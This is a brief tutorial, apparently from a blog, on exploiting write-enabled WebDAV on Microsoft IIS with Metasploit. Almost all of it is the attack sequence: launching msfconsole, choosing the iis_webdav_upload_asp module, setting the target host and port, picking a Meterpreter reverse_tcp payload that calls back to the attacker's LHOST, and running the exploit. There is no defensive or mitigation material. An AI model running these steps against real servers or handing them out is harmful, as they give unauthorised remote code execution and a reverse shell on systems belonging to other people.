Microsoft IIS – WebDAV Write Access Code Execution exploit using Metasploit
1. Open your terminal and start Metasploit by using this command
msfconsole
2. Now search exploit or set Exploit by using this command
use exploit/windows/iis/iis_webdav_upload_asp
3. Next, you need to set the target IP address and the port number.
set RHOST <Target IP address>
set RPORT <Port number>
4. After that, you need to set the payload.
set PAYLOAD windows/meterpreter/reverse_tcp
5. Now, set the LHOST (local host IP address).
set LHOST <local host IP address>
6. Finally, execute the exploit.
exploit